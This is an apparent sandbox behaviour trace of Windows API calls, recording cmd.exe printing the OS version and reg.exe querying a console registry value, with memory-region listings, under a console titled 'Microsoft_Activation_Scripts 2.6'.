SetConsoleCtrlHandler (HandlerRoutine=0x7ff7bd712ad0, Add=1) returned 1 [0175.903] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.903] SetConsoleMode (hConsoleHandle=0x9c, dwMode=0x0) returned 0 [0175.903] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.903] GetConsoleMode (in: hConsoleHandle=0x9c, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0175.903] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.903] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.904] GetEnvironmentStringsW () returned 0x24da2d85710* [0175.904] GetProcessHeap () returned 0x24da2d80000 [0175.904] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0xbd8) returned 0x24da2d862f0 [0175.904] memcpy (in: _Dst=0x24da2d862f0, _Src=0x24da2d85710, _Size=0xbd8 | out: _Dst=0x24da2d862f0) returned 0x24da2d862f0 [0175.904] FreeEnvironmentStringsA (penv="=") returned 1 [0175.904] GetProcessHeap () returned 0x24da2d80000 [0175.904] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x8) returned 0x24da2d82180 [0175.904] GetEnvironmentStringsW () returned 0x24da2d85710* [0175.904] GetProcessHeap () returned 0x24da2d80000 [0175.904] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0xbd8) returned 0x24da2d86ed0 [0175.904] memcpy (in: _Dst=0x24da2d86ed0, _Src=0x24da2d85710, _Size=0xbd8 | out: _Dst=0x24da2d86ed0) returned 0x24da2d86ed0 [0175.904] FreeEnvironmentStringsA (penv="=") returned 1 [0175.904] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x733175e838 | out: phkResult=0x733175e838*=0x78) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x0, lpData=0x733175e850*=0x0, lpcbData=0x733175e834*=0x1000) returned 0x2 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x1, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x0, lpData=0x733175e850*=0x1, lpcbData=0x733175e834*=0x1000) returned 0x2 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x0, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x40, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x40, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x0, lpData=0x733175e850*=0x40, lpcbData=0x733175e834*=0x1000) returned 0x2 [0175.905] RegCloseKey (hKey=0x78) returned 0x0 [0175.905] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x733175e838 | out: phkResult=0x733175e838*=0x78) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x0, lpData=0x733175e850*=0x40, lpcbData=0x733175e834*=0x1000) returned 0x2 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x1, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x0, lpData=0x733175e850*=0x1, lpcbData=0x733175e834*=0x1000) returned 0x2 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x0, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x9, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x4, lpData=0x733175e850*=0x9, lpcbData=0x733175e834*=0x4) returned 0x0 [0175.905] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x733175e830, lpData=0x733175e850, lpcbData=0x733175e834*=0x1000 | out: lpType=0x733175e830*=0x0, lpData=0x733175e850*=0x9, lpcbData=0x733175e834*=0x1000) returned 0x2 [0175.905] RegCloseKey (hKey=0x78) returned 0x0 [0175.906] time (in: timer=0x0 | out: timer=0x0) returned 0x662cc6e6 [0175.906] srand (_Seed=0x662cc6e6) [0175.906] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c ver" [0175.906] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c ver" [0175.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0175.906] GetProcessHeap () returned 0x24da2d80000 [0175.906] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x218) returned 0x24da2d87ae0 [0175.906] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24da2d87af0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0175.906] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0175.906] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0175.906] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x4 [0175.906] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0175.906] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.906] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.906] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.906] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.906] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.907] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.907] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.907] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.907] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.907] GetProcessHeap () returned 0x24da2d80000 [0175.907] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x38) returned 0x24da2d87d00 [0175.907] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x733175f640 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0175.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32", nBufferLength=0x104, lpBuffer=0x733175f640, lpFilePart=0x733175f620 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x733175f620*="System32") returned 0x13 [0175.907] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0175.908] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x733175f350 | out: lpFindFileData=0x733175f350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x24da2d80720 [0175.908] FindClose (in: hFindFile=0x24da2d80720 | out: hFindFile=0x24da2d80720) returned 1 [0175.908] memcpy (in: _Dst=0x733175f646, _Src=0x733175f37c, _Size=0xe | out: _Dst=0x733175f646) returned 0x733175f646 [0175.909] FindFirstFileW (in: lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x733175f350 | out: lpFindFileData=0x733175f350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x24da2d80720 [0175.909] FindClose (in: hFindFile=0x24da2d80720 | out: hFindFile=0x24da2d80720) returned 1 [0175.909] memcpy (in: _Dst=0x733175f656, _Src=0x733175f37c, _Size=0x10 | out: _Dst=0x733175f656) returned 0x733175f656 [0175.909] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0175.909] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0175.909] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0175.909] GetProcessHeap () returned 0x24da2d80000 [0175.910] RtlFreeHeap (HeapHandle=0x24da2d80000, Flags=0x0, BaseAddress=0x24da2d862f0) returned 1 [0175.910] GetEnvironmentStringsW () returned 0x24da2d85f20* [0175.910] GetProcessHeap () returned 0x24da2d80000 [0175.910] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0xbd8) returned 0x24da2d8a600 [0175.911] memcpy (in: _Dst=0x24da2d8a600, _Src=0x24da2d85f20, _Size=0xbd8 | out: _Dst=0x24da2d8a600) returned 0x24da2d8a600 [0175.911] FreeEnvironmentStringsA (penv="=") returned 1 [0175.911] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0175.911] GetProcessHeap () returned 0x24da2d80000 [0175.911] RtlFreeHeap (HeapHandle=0x24da2d80000, Flags=0x0, BaseAddress=0x24da2d87d00) returned 1 [0175.911] GetProcessHeap () returned 0x24da2d80000 [0175.912] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x4016) returned 0x24da2d8b1e0 [0175.912] GetProcessHeap () returned 0x24da2d80000 [0175.912] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x1c) returned 0x24da2d87d00 [0175.912] GetProcessHeap () returned 0x24da2d80000 [0175.913] RtlFreeHeap (HeapHandle=0x24da2d80000, Flags=0x0, BaseAddress=0x24da2d8b1e0) returned 1 [0175.913] GetConsoleOutputCP () returned 0x1b5 [0175.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.915] GetUserDefaultLCID () returned 0x409 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff7bd72d6a0, cchData=8 | out: lpLCData=":") returned 2 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x733175f770, cchData=128 | out: lpLCData="0") returned 2 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x733175f770, cchData=128 | out: lpLCData="0") returned 2 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x733175f770, cchData=128 | out: lpLCData="1") returned 2 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff7bd72d6b0, cchData=8 | out: lpLCData="/") returned 2 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff7bd72d700, cchData=32 | out: lpLCData="Mon") returned 4 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff7bd72d740, cchData=32 | out: lpLCData="Tue") returned 4 [0175.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff7bd72d780, cchData=32 | out: lpLCData="Wed") returned 4 [0175.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff7bd72d7c0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff7bd72d800, cchData=32 | out: lpLCData="Fri") returned 4 [0175.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff7bd72d840, cchData=32 | out: lpLCData="Sat") returned 4 [0175.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff7bd72d880, cchData=32 | out: lpLCData="Sun") returned 4 [0175.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff7bd72d6c0, cchData=8 | out: lpLCData=".") returned 2 [0175.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff7bd72d6e0, cchData=8 | out: lpLCData=",") returned 2 [0175.917] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.918] GetProcessHeap () returned 0x24da2d80000 [0175.918] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x0, Size=0x20c) returned 0x24da2d85f20 [0175.918] GetConsoleTitleW (in: lpConsoleTitle=0x24da2d85f20, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0175.919] GetProcAddress (hModule=0x7ffbed570000, lpProcName="CopyFileExW") returned 0x7ffbed598940 [0175.920] GetProcAddress (hModule=0x7ffbed570000, lpProcName="IsDebuggerPresent") returned 0x7ffbed597460 [0175.920] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0175.920] GetProcessHeap () returned 0x24da2d80000 [0175.920] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x4012) returned 0x24da2d8b1e0 [0175.920] GetProcessHeap () returned 0x24da2d80000 [0175.921] RtlFreeHeap (HeapHandle=0x24da2d80000, Flags=0x0, BaseAddress=0x24da2d8b1e0) returned 1 [0175.922] _wcsicmp (_String1="ver", _String2=")") returned 77 [0175.922] _wcsicmp (_String1="FOR", _String2="ver") returned -16 [0175.922] _wcsicmp (_String1="FOR/?", _String2="ver") returned -16 [0175.922] _wcsicmp (_String1="IF", _String2="ver") returned -13 [0175.922] _wcsicmp (_String1="IF/?", _String2="ver") returned -13 [0175.922] _wcsicmp (_String1="REM", _String2="ver") returned -4 [0175.922] _wcsicmp (_String1="REM/?", _String2="ver") returned -4 [0175.923] GetProcessHeap () returned 0x24da2d80000 [0175.923] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0xb0) returned 0x24da2d86140 [0175.923] GetProcessHeap () returned 0x24da2d80000 [0175.923] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x18) returned 0x24da2d80790 [0175.924] GetConsoleTitleW (in: lpConsoleTitle=0x733175f660, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.925] _wcsicmp (_String1="ver", _String2="DIR") returned 18 [0175.925] _wcsicmp (_String1="ver", _String2="ERASE") returned 17 [0175.925] _wcsicmp (_String1="ver", _String2="DEL") returned 18 [0175.925] _wcsicmp (_String1="ver", _String2="TYPE") returned 2 [0175.925] _wcsicmp (_String1="ver", _String2="COPY") returned 19 [0175.925] _wcsicmp (_String1="ver", _String2="CD") returned 19 [0175.925] _wcsicmp (_String1="ver", _String2="CHDIR") returned 19 [0175.925] _wcsicmp (_String1="ver", _String2="RENAME") returned 4 [0175.925] _wcsicmp (_String1="ver", _String2="REN") returned 4 [0175.925] _wcsicmp (_String1="ver", _String2="ECHO") returned 17 [0175.925] _wcsicmp (_String1="ver", _String2="SET") returned 3 [0175.925] _wcsicmp (_String1="ver", _String2="PAUSE") returned 6 [0175.925] _wcsicmp (_String1="ver", _String2="DATE") returned 18 [0175.925] _wcsicmp (_String1="ver", _String2="TIME") returned 2 [0175.925] _wcsicmp (_String1="ver", _String2="PROMPT") returned 6 [0175.925] _wcsicmp (_String1="ver", _String2="MD") returned 9 [0175.926] _wcsicmp (_String1="ver", _String2="MKDIR") returned 9 [0175.926] _wcsicmp (_String1="ver", _String2="RD") returned 4 [0175.926] _wcsicmp (_String1="ver", _String2="RMDIR") returned 4 [0175.926] _wcsicmp (_String1="ver", _String2="PATH") returned 6 [0175.926] _wcsicmp (_String1="ver", _String2="GOTO") returned 15 [0175.926] _wcsicmp (_String1="ver", _String2="SHIFT") returned 3 [0175.926] _wcsicmp (_String1="ver", _String2="CLS") returned 19 [0175.926] _wcsicmp (_String1="ver", _String2="CALL") returned 19 [0175.926] _wcsicmp (_String1="ver", _String2="VERIFY") returned -105 [0175.926] _wcsicmp (_String1="ver", _String2="VER") returned 0 [0175.926] GetProcessHeap () returned 0x24da2d80000 [0175.926] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x14) returned 0x24da2d807b0 [0175.926] GetProcessHeap () returned 0x24da2d80000 [0175.926] RtlAllocateHeap (HeapHandle=0x24da2d80000, Flags=0x8, Size=0x18) returned 0x24da2d807d0 [0175.926] GetVersion () returned 0x295a000a [0175.926] _vsnwprintf (in: _Buffer=0x733175f3c0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x733175f378 | out: _Buffer="10.0.10586") returned 10 [0175.927] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x733175f3a8 | out: _Buffer="\r\n") returned 2 [0175.927] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.927] GetFileType (hFile=0x9c) returned 0x3 [0175.927] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.927] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0175.927] WriteFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x733175f368, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x733175f368*=0x2, lpOverlapped=0x0) returned 1 [0175.928] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.928] GetFileType (hFile=0x9c) returned 0x3 [0175.928] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff7bd731b60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0175.930] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff7bd731b60, nSize=0x2000, Arguments=0x733175f380 | out: lpBuffer="Microsoft Windows [Version 10.0.10586]") returned 0x26 [0175.930] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.930] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.10586]", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.10586]", lpUsedDefaultChar=0x0) returned 39 [0175.930] WriteFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x733175f2d4, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x733175f2d4*=0x26, lpOverlapped=0x0) returned 1 [0175.931] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x733175f3a8 | out: _Buffer="\r\n") returned 2 [0175.931] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.931] GetFileType (hFile=0x9c) returned 0x3 [0175.931] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.931] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0175.931] WriteFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x733175f368, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x733175f368*=0x2, lpOverlapped=0x0) returned 1 [0175.931] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.931] SetConsoleMode (hConsoleHandle=0x9c, dwMode=0x0) returned 0 [0175.932] _get_osfhandle (_FileHandle=1) returned 0x9c [0175.932] GetConsoleMode (in: hConsoleHandle=0x9c, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0175.932] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.932] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.932] SetConsoleInputExeNameW () returned 0x1 [0175.932] GetConsoleOutputCP () returned 0x1b5 [0175.935] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.935] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.935] exit (_Code=0) Thread: id = 49 os_tid = 0xd78 Process: id = "9" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x2d96c000" os_pid = "0xce0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "reg query \"HKCU\\Console\" /v ForceV2 " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1106 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1107 start_va = 0x3cc5a40000 end_va = 0x3cc5abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000003cc5a40000" filename = "" Region: id = 1108 start_va = 0x3cc5c00000 end_va = 0x3cc5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000003cc5c00000" filename = "" Region: id = 1109 start_va = 0x18bc6590000 end_va = 0x18bc65affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018bc6590000" filename = "" Region: id = 1110 start_va = 0x18bc65b0000 end_va = 0x18bc65c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018bc65b0000" filename = "" Region: id = 1111 start_va = 0x18bc65d0000 end_va = 0x18bc65d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018bc65d0000" filename = "" Region: id = 1112 start_va = 0x18bc65e0000 end_va = 0x18bc65e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018bc65e0000" filename = "" Region: id = 1113 start_va = 0x18bc65f0000 end_va = 0x18bc65f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018bc65f0000" filename = "" Region: id = 1114 start_va = 0x7df5ff3f0000 end_va = 0x7ff5ff3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff3f0000" filename = "" Region: id = 1115 start_va = 0x7ff7b66f0000 end_va = 0x7ff7b6712fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b66f0000" filename = "" Region: id = 1116 start_va = 0x7ff7b7500000 end_va = 0x7ff7b7555fff monitored = 1 entry_point = 0x7ff7b750e200 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 1117 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1130 start_va = 0x18bc6600000 end_va = 0x18bc68dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018bc6600000" filename = "" Region: id = 1131 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1132 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1133 start_va = 0x18bc6590000 end_va = 0x18bc659ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018bc6590000" filename = "" Region: id = 1134 start_va = 0x7ff7b65f0000 end_va = 0x7ff7b66effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b65f0000" filename = "" Region: id = 1140 start_va = 0x18bc6600000 end_va = 0x18bc66bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1141 start_va = 0x18bc67e0000 end_va = 0x18bc68dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018bc67e0000" filename = "" Region: id = 1142 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1143 start_va = 0x3cc5ac0000 end_va = 0x3cc5b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000003cc5ac0000" filename = "" Region: id = 1144 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = 